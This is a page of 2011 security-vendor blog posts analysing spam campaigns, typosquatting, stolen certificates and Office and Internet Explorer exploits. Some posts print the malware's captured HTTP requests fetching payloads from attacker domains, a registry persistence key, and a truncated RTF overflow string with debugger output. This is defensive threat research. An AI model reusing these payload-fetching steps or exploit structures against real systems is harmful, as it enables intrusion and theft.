View All General

The Beauty and the BEAST

By Avri Schneider  •  September 28th, 2011  •   General

Transport Layer Security – (TLS) is a protocol often used during HTTPS connections to secure web sites. For almost a decade, it has been known that TLS 1.0 was insecure and vulnerable to attack – primarily due to its usage of the Cipher Block Chaining (CBC) mode of operation.  TLS version 1.1 and then TLS version 1.2 have been designed to cope with this and other weaknesses.

The theoretical attack published by Gregory V. Bard back in April 2006 has been exploited (although not in the wild) and a proof-of-concept has been recently developed. Just a little over a week ago, researchers Thai Duong and Juliano Rizzo demonstrated their proof-of-concept called BEAST – Acronym for Browser Exploit Against SSL/TLS and a few days ago, published a blog post describing the attack in detail.

Even though Microsoft, Google, Mozilla and Opera have  already released information or fixes for this issue, it is surprising that Internet Explorer, Chrome, Firefox and Opera, all recent web browsers, had this vulnerability unpatched for this long – leaving many users vulnerable to the particular type of attack SSL was designed to protect against.

OpenSSL has implemented a workaround for this vulnerability since version 0.9.6d which was released in May 2002, however some browsers use the Network Security Services (NSS) library, which remained vulnerable to this attack.

The beauty is that the M86 Secure Web Gateway appliance in its default configuration provides zero-day protection against  this (and other) types of attack.

The complexity, time and cost of keeping all browsers in an organization patched against all the latest security threats highlights the importance of not relying solely on client-side security solutions.

Regardless of whether browsers behind the Secure Web Gateway get patched and how quickly that happens, they are protected behind M86 Security Secure Web Gateway.

Tags:  

View All General

DigiNotar Certificates Revoked Following Theft

By Anat Davidi  •  September 13th, 2011  •   General

Last year as we considered possible future threats, one of our predictions for 2011 thoughts turned to the use of stolen digital certificates becoming increasingly more common.  We envisioned malicious websites and applications being signed using stolen digital certificates and validated by products and applications that fail to keep up to date with these events. It appears that our predictions are becoming a reality as we begin to see more and more cases of stolen certificates.

Recently, certificates belonging to a Certification Authority by the name of DigiNotar were stolen.  These were used to issue hundreds of certificates, amongst them, a certificate for the domain *.google.com which was used to execute Man-in-the-Middle attacks against users of encrypted Google services.

Following this incident, companies such as Microsoft, Google and Mozilla have all taken action to protect their respective products.

M86 Security has issued a Security Update for our Secure Web Gateway product, moving the five stolen root certificates to the untrusted list:

 

  • DigiNotar Root CA
  • DigiNotar Root CA G2
  • DigiNotar PKIoverheid CA Overheid
  • DigiNotar PKIoverheid CA Organisatie – G2
  • DigiNotar PKIoverheid CA Overheid en Bedrijven

 

 

Given that some of these certificates are already being used in active attacks, customers are highly advised to install this update (M86 Security Update 120).

 

With the update installed, Secure Web Gateway clients will be protected against malicious files signed with certificates issued by this Certification Authority in an attempt to appear legit, as well as Man-in-the-Middle attacks against users of various encrypted services. These will be blocked for a digital certificate violation.

 

To verify that the update has been installed and to observe the changes to Secure Web Gateway’s digital certificates, customers may inspect the product’s web administration interface under Administration > System Settings > Digital Certificates.  Here customers will see the certificates removed from the “M86 Security Trusted Root CA”, which can now be found under “M86 Security Untrusted Publishers”.

 

Secure Web Gateway Digital Certificates - "M86 Security Untrusted Publishers" list contains the five DigiNotar certificates

 

M86 Security will continue to keep track of the situation and take actions as necessary to keep our customers safe.

Tags:    |  

View All Cybercrime

Typosquatters exploit misspelled variations of YouTube.com domain name

By Rodel Mendrez  •  September 8th, 2011  •   Cybercrime

Here is a scenario that may sound familiar to you. You were in front of your computer one night and decided to watch some YouTube clips. So you opened your favourite browser and because you have clumsy fingers, instead of typing “YouTube.com” in the address bar you entered “YoutTube.com”.  A second later, a Web page loads up, but instead of YouTube’s homepage, the page redirects you to an online survey. You got confused and didn’t expect this webpage, but since the website looks like the real YouTube site, and you get a chance to win an awesome Macbook Air, iPhone 4 or an iPad 2, you decided to take the plunge anyway.

 

Welcome to typosquatting. Typosquatting is a form of cybersquatting where someone registers an intentionally misspelled domain name which is nearly identical to the target’s brand name and takes advantage of users who mistakenly enter misspelled domain names. Typosquatting is not a new phenomenon but it is widespread. Only last week the folks at OpenDNS observed a typosquatting scam driven off Twitter’s domain.

In our YouTube example, traffic is redirected to the “online survey” website videorewardsonline.com when the user enters YoutTube.com. According to Alexa.com, the domain videorewardsonline.com was only created on August 24 and has had a rapid spike in traffic with a 29% increase in the percentage of global page views. We believe this spike was due to users being redirected by typosquatted domain names.

We have found the following misspelled variations of “YouTube” domains redirecting to either, a “survey” website, or to an online dating website.

Yotube.com

Yutube.com

Yuube.com

Youtbe.com

Youtue.com

Youtub.com

Youube.com

Tubeyou.com

Yutbe.com

Outube.com

Yotub.com

Yutub.com

Youtbue.com

Youttube.com

Yyoutube.com

The survey website also caters for localized versions of itself. It utilizes the IP address geolocation to make it appear more convincing. In the screenshot below, a German webpage is shown if you are located in Germany.

At first glance, the survey website looks rather harmless. However, in order to participate and “win” prizes it requires entering your email and mobile number. At this point you may feel that this is starting to look somewhat dodgy.

 

However, the worst part comes after you enter your mobile number. The screenshot below shows that main purpose of the “survey” is to convince people to subscribe to an auto-renewing SMS subscription service which will be charged to the user’s phone bill.

 

You can clearly see how the people behind this typosquatting scam take advantage of an organization’s strong visual brand to trick unsuspecting users in parting with their personal information. In this case, by imitating YouTube’s look and feel, the scamsters piggyback on that brand’s trust to make the “rewards” seem genuine.

Be careful what you type in your browser’s address bar, and always read the fine print to avoid being scammed.

 

Tags:    |    |    |    |  

View All MalwareView All Spam

An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet

 

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a random generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe”"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.

Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.

 

The malware code that attempts to connect to the control server

 

Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot

 

Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

 

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

 

This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.

Tags:    |    |    |    |    |    |  

View All Malware

Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links.  However, there are clues it is fake.  The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.

 

By contrast, here is a legitimate Facebook friend request.

 

Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilites on your system, notably Java.

 

 

The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

 

Tags:    |    |    |    |    |  

View All Spam

Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.

 

Last week malicious spam made up at least 13% of the total spam volume we received which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet are mostly recycled spam themes – Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign

 

Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox

 

The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.

Tags:    |    |    |  

View All Spam

Malicious hotel transaction spam

By Gavin Neale  •  July 29th, 2011  •   Spam

Over the past couple of days we have been seeing numerous spam emails which claim that a wrong transaction was made on your credit card from a hotel.
The subject lines look similar to the following two subjects, with varying hotels

Hotel Sutton Place made wrong transaction
Wrong transaction from your credit card in Four Seasons Resort Scottsdale

We have also seen several different message bodies that try to explain, in fairly bad English, that your credit card has been charged by a hotel and that in order to get your money back you will need to fill in an attached form and send it to your bank.

Dear Guest!
Transaction: Visa 86878_j
This letter notifies that on July 26th, 2011 Hotel made wrong writing-down from your credit account. Total sum of decommissioning is $1937
Due to the termination of service contract between Hotel Melia Deviana and Moverick Company this Hotel was divested accreditation in our company.
For the return of funds please contact your bank and fill information in the attached form.
The detailed copy of made writing-down you can find in the attachment.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Alexander Hargrave,
Manager of Reception Desk & Reservation Departament

Dear Client!
Transaction: Visa 4098_6e
On July 26th, 2011 Hotel made wrong transaction decommissioning from your credit card totaling $1037.
This partner hotel was divested accreditation in Moverick Company with reference of noncompliance of the service contract.
Please see the attached form. You need to fill it in and contact your bank for the return of funds.
In the attachment you will find expense sheet with the sum of wrong transaction writing-down.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Caleb Anketil,
Manager of Reception Desk & Reservation Departament

 

Attached is a Zip file named RefundFormXXX.zip, where XXX is a random three digit number. Inside this Zip file is an executable file; Refund-Form.exe which has an icon likely intended to deceive unsuspecting victims into thinking that it is in fact some type of form which they can view.

The executable inside the 'RefundForm' Zip file

 

Once executed this malware downloads the file soft.exe from yomwarayom2001[dot]ru (84.247.61.25). This did not run straight away so we ran it on a separate test machine and verified that this is a fake AV product named ‘Security Protection’.

A further HTTP request is sent to 188.72.202.121, shown below, which requests a module called ‘grabbers’ from load.php.

The HTTP request and response for the encrypted password stealer

 

The file that is retrieved, called ‘update.dat’ is in fact an encrypted Windows dll file. Once decrypted we discovered that it was a password stealer which targets a huge number of applications including instant messaging programs, poker clients, FTP clients and web browsers looking for stored passwords.

Screenshot of the disassembled password stealer showing some of the targeted applications.

 

Almost a day later, with still no visible signs that our test machine was infected, the HTTP request below was sent which downloaded the file 1036.exe.

HTTP download of 1036.exe

 

Within minutes of this download finishing, a fake AV program called ‘Personal Shield pro’ was launched.

Both the attached executable files and those that were downloaded after the initial infection had very low detection rates among anti-virus engines, which highlights the need to be very cautious when opening email attachments and to keep anti-virus software up to date.

 

Thanks to Rodel Mendrez for his investigation into the password stealer component.

View All Cybercrime

Resurrection of CVE-2010-3333 In-The-Wild

By Yaniv Miron  •  July 5th, 2011  •   Cybercrime

During the last few weeks we’ve seen massive use of the CVE-2010-3333 vulnerability for Microsoft Office. This eight months old vulnerability is used in popular documents such as a document that pretends to be “President Obama’s Speech”.

Microsoft Office vulnerabilities have become very popular over the last few years and here are several samples that can be found In-The-Wild that use MS10-087 / CVE-2010-3333.

A brief overview of the vulnerability can be found at mitre CVE-2010-3333

“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka “RTF Stack Buffer Overflow Vulnerability.”

As we can see there is an exploit that is a part of the Metasploit exploit framework:


Figure 1 – Metasploit main page

The vulnerability is actually an .RTF file type vulnerability but can be launched by using a .DOC file (not an actual .DOC file but a .DOC extension).

Figure 2 – Part of the exploit from Metasploit

 

CVE-2010-3333 Sample Analysis

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

The following analysis was performed via Word 2003.

Here we can see the text view of the file and we can clearly see that they are using CVE-2010-3333:

Figure 3 – Text view of CVE-2010-3333 sample

Lets examine the hex view of the file:

Figure 4 – Hex view of CVE-2010-3333 sample

 

Now, let’s examine the beginning of the file:

{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1000000…[SNIP]…0;01234567ff000…[SNIP]…

From Microsoft Office Word 2003 Rich Text Format (RTF) Specification:

“Drawing Object Properties

The bulk of a drawing object is defined as a series of properties. The { \shp ………… control word is followed by { \*\shpinst  Following the { \*\shpinst   is a list of all the properties of a shape. Each of the properties is in the following format:

{ \sp  { \sn PropertyName } { \sv PropertyValueInformation } }

The control word for the drawing object property is \sp. Each property has a pairing of the name (\sn) and value (\sv) control words placed in the shape property group.”

We see that it’s an .RTF file type, that contains a “sn” (Designates paragraph style.) with a PropertyName “pFragments” (Fragments are optional, additional parts to the shape. They allow the shape to contain multiple paths and parts. This property lists the fragments of the shape.). After that, we see a “sv” that contains a value, a semicolon and a second value followed by a second semicolon and a third value. The third value is the cause of the buffer overflow.

Now that we’ve seen that hackers use the vulnerability In-The-Wild, let’s try and get a better understanding of the vulnerability by using the Metasploit sample:

{\rtf1{\shp{\sp{\sn pFragments}{\sv 5;6;11111111acc8111…[SNIP]…

 

ASM Info:

30e9eb72 81e1ffff0000       and     ecx,0FFFFh

30e9eb78 56                           push    esi

30e9eb79 8bf1                       mov     esi,ecx

30e9eb7b 0faf742414          imul    esi,dword ptr [esp+14h]

30e9eb80 037010                 add     esi,dword ptr [eax+10h]

30e9eb83 8bc1                      mov     eax,ecx

30e9eb85 c1e902                  shr     ecx,2

30e9eb88 f3a5                       rep movs dword ptr es:[edi],dword ptr [esi] ; Overflow!

30e9eb8a 8bc8                       mov     ecx,eax

30e9eb8c 83e103                  and     ecx,3

30e9eb8f f3a4                        rep movs byte ptr es:[edi],byte ptr [esi]

30e9eb91 5e                           pop     esi

30e9eb92 5f                            pop     edi

30e9eb93 c20c00                  ret     0Ch

 

Debugger info:

(100.3f8): Access violation – code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=0000c8ac ebx=05000000 ecx=00000023 edx=00000000 esi=025dc82c edi=00130000

eip=30e9eb88 esp=001237b8 ebp=001237f0 iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

…[SNIP]…

mso!Ordinal6426+0x64d:

30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

 

In-The-Wild Samples

Here are few of the samples that we’ve found:

File Name: 2011 Insider’s Guide to Military Benefits .doc

MD5: f520c8671ddb9965bbf541f20635ef30

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

File Name: Q and A.doc

MD5: 46863c6078905dab6fd9c2a480e30ad0

The samples use different shellcodes, but as we can see, the exploit is In-The-Wild and is being used by malicious hackers.

These types of attacks are blocked by M86 Security’s Secure Web Gateway solution.

Tags:    |    |    |    |    |    |    |    |    |    |  

View All Spam

Malicious spam campaign: Credit Card Overdue

By Rodel Mendrez  •  June 30th, 2011  •   Spam

We are currently seeing a large scale malicious spam campaign that claims to be a “Credit Card Overdue” notice. The campaign is originating from one of the Cutwail spambot variants. The theme has no specific credit card brand, possibly because the spammer thought a generic template may entice more victims. The spam message claims the credit card holder has an overdue credit card that needs to be settled in 2 days or else a $25 late fee and finance charge will be imposed.

The malicious application is attached in a zip file disguised as a credit card statement. Extracting the Zip file reveals a Trojan downloader executable file that uses a Adobe PDF icon. When the executable is run it downloads a fake anti-virus executable from the following url:

http://mysteryforyou1[dot]ru/pusk.exe


The fake AV pops up a fake warning.

Fake AV system utility

Spammers are constantly inventing new social engineering themes in an effort to distribute their malware. Targeting credit card holders, especially in this tough economy, is just another theme in their portfolio. The spammers can change their themes over time, and often just recycle old ones. There is enough in this message to cause most people to be suspicious, especially the fact that your credit card company is unlikely to be emailing you in the first place.  So, as usual, be wary.

Tags:    |    |    |    |    |    |  

View All CybercrimeView All MalwareView All Vulnerabilities

0-day exploit used in a targeted attack – CVE-2011-1255

By Avri Schneider  •  June 26th, 2011  •   Cybercrime Malware Vulnerabilities

Time Element Memory Corruption – a remote code execution vulnerability, recently patched by Microsoft as part of MS11-050, bearing the Common Vulnerabilities and Exposures (CVE) number CVE-2011-1255 is being actively exploited in the wild.

M86 Security Labs team was contacted and asked to inspect the URL of a legitimate website of a large private company that was blocked by one of the proactive detection rules implemented in our Secure Web Gateway product.

We were asked to investigate if it was indeed a malicious page or a case of Over-Blocking.

The page looked benign, but inspecting each included JavaScript code, we saw that one of them:

Was injecting an iframe:

pointing to a malicious page that was very easilty classified as malicious due to shellcode patterns being part of the page’s DOM:

So, just another infected site – big deal right? But, after further inspection, we saw that it exploited an un-published security vulnerability in Internet Explorer. To verify this, we viewed the malicious page on the latest fully patched version of IE and saw a crash followed by execution of malicious code.

You can imagine the excitement on the team – finding a 0-day in the wild!

The excitement of finding a 0-day in the wild didn’t last that long, since soon after, Microsoft released details about this particular vulnerability.

Based on data we have reviewed from various sources, we can say with a high level of certainty, that the anonymous researcher who according to Microsoft’s security advisory, reported the vulnerability details to VeriSign iDefense, or at least one of his acquaintances, had used the vulnerability details for malicious purposes, as part of targeted attacks.

We decided that we should inspect the shellcode to see what the attacker was after. It used various anti-debugging tricks, but after decoding, it revealed a clear-text URL pointing to a malicious server already listed in our repository.

The attack sample stored in our repository was an attack for the well-known iepeers.dll vulnerability exploiting CVE-2010-0806.

It is interesting to note that the first saved sample of the attack was dated 21.3.10, while details of the vulnerability were reported and patched by Microsoft’s MS10-018 security patch for Internet Explorer on 30.3.10.

Two 0-day exploits served from the same server – impressive!

We wanted to find out where else he is serving his malicious code.

Remember the code snippet shown above, showing how the attacker hid the shellcode as part of the DOM?

Hiding data in the DOM of the page is a good obfuscation technique that bypasses security software that doesn’t act as an actual browser, and where their script engine does not have access to the actual DOM.

It turns out that one of the side-effects of hiding data inside DIV elements is that it makes the data indexable by search engines.

Google searching the pattern “TTu0d0f[...snip...]d0dLL1043416UU” revealed about 16 results and as of this writing, only a few were still alive.

Here is the list of the infected sites according to Google’s search result:

Not to mention the service of caching samples for us, it’s ironic that an attacker’s obfuscation technique can be used against him to find his infection servers using a simple Google search. :)

Tags:    |    |    |  

« Older Entries
Newer Entries »